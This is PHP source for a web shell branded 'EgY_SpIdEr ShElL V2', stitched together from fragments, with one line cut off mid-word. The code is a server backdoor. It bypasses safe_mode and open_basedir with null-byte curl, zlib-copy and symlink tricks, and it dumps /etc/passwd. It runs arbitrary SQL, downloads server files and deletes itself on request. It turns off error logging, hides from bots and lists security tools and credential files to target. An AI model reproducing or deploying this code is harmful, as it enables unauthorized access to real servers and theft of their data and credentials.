$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea></CENTER>";
}
break;
case 'copy':
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
$u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea></CENTER>";
}
break;
case 'ini_restore':
if(empty($_POST['ini_restore'])){
} else {
$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["egy"]);
echo "</textarea></CENTER>";
}
break;
case 'glob':
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");
foreach ($files as $filename) {
echo "$filename\n";
}
}
if(isset($_REQUEST['glob']))
{
reg_glob();
}
break;
case 'sym1':
if(empty($_POST['sym1p'])){
} else {
$symp=$_POST['sym1p'];
}
if(empty($_POST['sym1p2'])){
} else {
$symp2=$_POST['sym1p2'];
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy".$symp2."".$symp."", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
}
}
break;
case 'sym2':
@include(xxx);
break;
case 'plugin':
if ($_POST['plugin'] ){
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
}
}
}
}
if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if($file=moreread($_POST['d_name'])){ $filedump = $file; }
else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
if(!empty($_POST['cmd']))
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['12']))
{
@unlink(__FILE__);
}
if(isset($_GET['11']))
{
@unlink($tempdir.'bdpl');
@unlink($tempdir.'back');
@unlink($tempdir.'bd');
@unlink($tempdir.'bd.c');
@unlink($tempdir.'dp');
@unlink($tempdir.'dpc');
@unlink($tempdir.'dpc.c');
@unlink($tempdir.'prxpl');
@unlink($tempdir.'grep.txt');
}
if(isset($_GET['2']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRU
###########################################
# EgY_SpIdEr ShElL V2 #
# EgY_SpIdEr #
# www.egyspider.eu #
###########################################
//Change User & Password
$tacfgd['uname'] = 'egy_spider';
$tacfgd['pword'] = 'egy_spider';
// Title of page.
$tacfgd['title'] = 'EgY_SpIdEr ShElL';
// Text to appear just above login form.
$tacfgd['helptext'] = 'EgY SpIdEr ShElL';
// Set to true to enable the optional remember-me feature, which stores encrypted login details to
// allow users to be logged-in automatically on their return. Turn off for a little extra security.
$tacfgd['allowrm'] = true;
// If you have multiple protected pages, and there's more than one username / password combination,
// you need to group each combination under a distinct rmgroup so that the remember-me feature
// knows which login details to use.
$tacfgd['rmgroup'] = 'default';
// Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
// In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
// destroy the session, so that is left up to you.
$tacfgd['ownsessions'] = false;
foreach ($tacfgd as $key => $val) {
if (!isset($tacfg[$key])) $tacfg[$key] = $val;
}
if (!$tacfg['ownsessions']) {
session_name('txtauth');
session_start();
}
// Logout attempt made. Deletes any remember-me cookie as well
if (isset($_GET['logout']) || isset($_POST['logout'])) {
setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
if (!$tacfg['ownsessions']) {
$_SESSION = array();
session_destroy();
}
else $_SESSION['txtauthin'] = false;
}
// Login attempt made
elseif (isset($_POST['login'])) {
if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
$_SESSION['txtauthin'] = true;
if ($_POST['rm']) {
// Set remember-me cookie for 2 weeks
setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
}
}
else $err = 'Login Faild !';
}
// Remember-me cookie exists
elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
$_SESSION['txtauthin'] = true;
}
else $err = 'Login Faild !';
}
if (!$_SESSION['txtauthin']) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<html dir=rtl>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title><?=$tacfg['title']?></title>
<STYLE>
BODY
{
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}
tr {
BORDER-RIGHT: #dadada ;
BORDER-TOP: #dadada ;
BORDER-LEFT: #dadada ;
BORDER-BOTTOM: #dadada ;
color: #ffffff;
}
td {
BORDER-RIGHT: #dadada ;
BORDER-TOP: #dadada ;
BORDER-LEFT: #dadada ;
BORDER-BOTTOM: #dadada ;
color: #dadada;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #dadada;
}
table {
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #dadada;
}
input {
BORDER-RIGHT: #00FF00 1 solid;
BORDER-TOP: #00FF00 1 solid;
BORDER-LEFT: #00FF00 1 solid;
BORDER-BOTTOM: #00FF00 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #dadada;;
}
submit {
BORDER: buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #dadada;
}
textarea {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #dadada;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
<body>
<br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
<hr width="300" size="1" noshade color="#cdcdcd">
<p>
<div align="center" class="grey">
<?=$tacfg['helptext']?>
</div>
<p>
<?
if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
?>
<form name="txtauth" action="<?=$action?>" method="post">
<div align="center">
<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
<?if (isset($tacfg['uname'])) {?>
<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
<?}?>
<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
<?if ($tacfg['allowrm']) {?>
<tr><td align="left"><input type="submit" name="login" value="Login">
</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm">
Remmeber Me?</label></td></tr>
<?} else {?>
<tr><td colspan="2" align="center">
<input type="submit" name="login" value="Login"></td></tr>
<?}?>
</table>
</div>
</form>
<br><br>
<hr width="300" size="1" noshade color="#cdcdcd">
<div class="smalltxt" align="center">Developed by
<a href="mailto:egy_spider@hotmail.com">EgY SpIdEr </a>· copyright ©
& EgY SpIdEr</div>
</body>
</html>
<?
// Don't delete this!
exit();
}
?>
Login As (<font color="#FF0000"><? echo $tacfgd['uname']; ?></font>) <a href="?logout=1">Logout</a></p>
<div align="right">
<?php
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
$language='eng';
$auth = 0;
$name='7d1f6442a9ed59e62f93dcbc2695baa6';
$pass='7d1f6442a9ed59e62f93dcbc2695baa6';
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);
}
else
{
@ini_alter('error_log',NULL);
@ini_alter('log_errors',0);
@ini_alter('file_uploads',1);
@ini_alter('allow_url_fopen',1);
}
error_reporting(E_ALL);
/* ??? ????? */
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
$downloaders = array('wget','fetch','lynx','links','curl','get');
/* ??? ?????? ???????? ???? ????? realpath() */
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.01234567890";
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
/******************************************************************************************************/
define("starttime",@getmicrotime());
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
}
else
{
@ini_alter('max_execution_time',0);
@ini_alter('output_buffering',0);
}
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
$version = '1.42';
if(@version_compare(@phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>Access Denied</h1>");
}
}
if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
$tempdir='./';
$select_tempdir = '<select name=tempdir><option value="./">./</option>';
foreach( $tempdirs as $item) {
if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
}
$select_tempdir .= '</select>';
}else{
if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
$select_tempdir = $_COOKIE['select_tempdir'];
}
$head = '<!-- EgY_SpIdEr -->
<html>
<head>
<meta http-equiv="Content-Language" content="ar-sa">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>EgY_SpIdEr ShElL</title>
<STYLE>
BODY
{
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}
tr {
BORDER-RIGHT: #333333 ;
BORDER-TOP: #333333 ;
BORDER-LEFT: #333333 ;
BORDER-BOTTOM: #333333 ;
color: #FFFFFF;
}
td {
BORDER-RIGHT: #333333 ;
BORDER-TOP: #333333 ;
BORDER-LEFT: #333333 ;
BORDER-BOTTOM: #333333 ;
color: #FFFFFF;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #333333;
}
table {
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #333333;
}
input {
BORDER-RIGHT: #00FF00 1 solid;
BORDER-TOP: #00FF00 1 solid;
BORDER-LEFT: #00FF00 1 solid;
BORDER-BOTTOM: #00FF00 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #333333;;
}
submit {
BORDER: buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #333333;
}
textarea {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #333333;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function moreread($temp){
global $lang,$language;
$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
if($ffile){
while(!@feof($ffile)){$str .= @fgets($ffile);};
fclose($ffile);
}
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
if($ffile){
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
}
}elseif(@function_exists('file')&&($ffiles = @file($temp))){
foreach ($ffiles as $ffile) { $str .= $ffile; }
}elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
}elseif(@function_exists('readfile')){
$str = @readfile($temp);
}elseif(@function_exists('highlight_file')){
$str = @highlight_file($temp);
}elseif(@function_exists('show_source')){
$str = @show_source($temp);
}else{echo $lang[$language.'_text56'];}
return $str;
}
function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
if(@copy("compress.zlib://".$filename, $temp)) {
$str = moreread($temp);
} else echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}
function morewrite($temp,$str='')
{
global $lang,$language;
if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fwrite($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fputs($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('file_put_contents')){
@file_put_contents($temp,$str);
}else return 0;
return 1;
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!@function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
case 'MySQLi':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysqli_connect')) return 0;
$this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
if(is_resource($this->connection)) return 1;
break;
case 'mSQL':
if(!@function_exists('msql_connect')) return 0;
$this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'SQLite':
if(!@function_exists('sqlite_open')) return 0;
$this->connection = @sqlite_open($this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
case 'MySQLi':
return 1;
break;
case 'mSQL':
if(@msql_select_db($this->base,$this->connection)) return 1;
break;
case 'SQLite':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
case 'MySQLi':
if(false===($this->res=@mysqli_query($this->connection,$query)))
{
$this->error = @mysqli_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'mSQL':
if(false===($this->res=@msql_query($query,$this->connection)))
{
$this->error = @msql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'SQLite':
if(false===($this->res=@sqlite_query($this->connection,$query)))
{
$this->error = @sqlite_error_string($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
